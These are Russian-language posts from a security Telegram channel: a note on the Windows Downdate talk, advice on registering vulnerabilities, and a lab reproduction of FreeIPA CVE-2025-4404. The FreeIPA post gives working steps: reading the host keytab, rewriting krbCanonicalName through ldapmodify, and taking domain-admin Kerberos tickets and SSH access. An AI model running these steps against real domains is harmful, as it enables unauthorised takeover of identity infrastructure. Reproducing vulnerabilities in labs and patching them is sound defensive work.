GigaHackers
2.53K subscribers
77 photos
3 videos
10 files
72 links
Информация предоставлена исключительно в образовательных или исследовательских целях. Противоправные деяния преследуются по закону.
Авторы: @WILD_41, @Oki4_Doki и @VlaDriev
Download Telegram
[PoC Windows Downdate]

Всем привет!👋

Не так давно отгремели конференции Black Hat 2024 и DEF CON 32. Лучшие исследователи со всего мира поделились своими наработками. Хочу отметить несколько из них, которые меня заинтересовали. Публиковать буду постепенно, так как контента достаточно много.

Первый доклад, который меня зацепил - Windows Downdate: Downgrade Attacks Using Windows Updates

Автор рассказал как можно понизить версии отдельных файлов через центр обновления Windows и тем самым сделать ОС уязвимой к старым проблемам! 👍
Для понимания рекомендую к прочтению публикацию 📝

💻 И уже даже есть PoC с примерами от автора!

🐤 Ну и конечно ссылка на автора.


#Windows #PoC #AD #DC32 #BH2024 #CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍52👌2🦄1
[Регистрация уязвимостей]

Всем привет! 👋

Сегодня хочу поднять важную тему для каждого ИБ-специалиста, особенно пентестера. Однажды вы можете обнаружить уязвимость, которую никто нигде не публиковал, и не важно, специально вы ее искали или нашли мимоходом. 👀 Будучи настоящими этичными хакерами у вас может возникнуть желание сообщить об уязвимости вендору/производителю софта или оборудования, но как это это сделать?

Чутка теории: зарегистрировать уязвимость можно в БДУ ФСТЭК (но только в ПО, которое "используется на объектах ГИС и КИИ"), со всеми остальными уязвимостями нужно идти в MITRE и регистрировать CVE. 🐈

Весь процесс очень зависит от вендора, с которым вы взаимодействуете, но если вам повезло, то в идеале это будет строиться примерно по схеме, которую я разместил в своих заметках. 📝

Иногда бывают различные выдающиеся случаи 💻, о которых лучше говорить отдельно и в формате подкаста или посиделок (кстати, если у вас есть такие истории и желание поделиться ими - дайте знать в комментах или в ЛС) ✏️

В заключении хочется сказать, что безумно приятно взаимодействовать с адекватными вендорами, которые ради тебя готовы даже открыть зал славы. 🔥

#cve #learn #notes
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17🔥94🥰1🌭1
[FreeIPA CVE-2025-4404]

Всем привет! 👋

Пока все внимательно смотрят за новыми CVE и векторами в AD инфраструктуре как-то мимо проходят интересные штуки под FreeIPA инфру. Недавно вышла CVE на повышение привилегий от хоста до админа домена. Также подробности описаны в релизе.

Мы с @Zzyybbzzyabb смогли воспроизвести ее на стенде. Этому как раз и будет посвящен пост.

Начальные условия:

🟡 Домен FreeIPA
🟡 root доступ на одном из узлов домена. (Кстати очень удачно вышло LPE, о котором писали в предыдущем посте)

🔴 Акцентирую внимание, что даже не нужен доступ к УЗ в домене. (root доступ на узле не то же самое, что УЗ в домене)

🔘 Этап 1. Достаем секреты с машины - keytab для запроса TGT

Обычно он лежит по пути /etc/krb5.keytab

Чтобы убедиться, что keytab принадлежит машине можно сделать


klist -k /etc/krb5.keytab


Там должно быть что-то типа такого host/[email protected]

🔘 Этап 2. Получение TGT

Копируем полученный keytab себе на машину по тому же пути /etc/krb5.keytab и потом выполняем команды:

kinit -k host/client.test.local
klist


🔘 Этап 3. Подмена krbCanonicalName в LDAP

Вся соль начинается здесь:
⚫️ У машинной УЗ есть право менять krbCanonicalName. Но проблема даже не в этом.
⚫️ Когда атрибут изменяется - никто не проверяет, существует ли уже объект с таким именем в LDAP. Поэтому машина может сделать себе krbCanonicalName = [email protected].
⚫️ При запросе TGT, если атрибут krbCanonicalName у принципала существует, то билет будет выдан на его имя. (В идеальном мире он совпадает с krbPrincipalName)

Для внесения изменения в объект LDAP создадим LDIF-файл со следующим содержимым:


dn: fqdn=client.test.local,cn=computers,cn=accounts,dc=test,dc=local
changetype: modify
replace: krbCanonicalName
krbCanonicalName: [email protected]


Применяем:


ldapmodify -Y GSSAPI -H ldap://ipa.test.local -f change_canonical.ldif


🔘 Этап 4. Получение TGT уже с именем [email protected]


kinit -k host/client.test.local
klist


Видим что-то типа: Default principal: [email protected]

🔘 Этап 5. Доступ по SSH на DC как admin через Kerberos


ssh [email protected]
whoami


В результате получаем полноценный доступ от администратора в домене.

Рекомендации:
🟣 Установить обновления безопасности CVE-2025-4404
🟣Подробности в официальных источниках

Все манипуляции были проведены на стенде FreeIPA версии 4.6.8

@GigaHack

#pentest #freeipa #infra #cve
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍84🌭1🦄1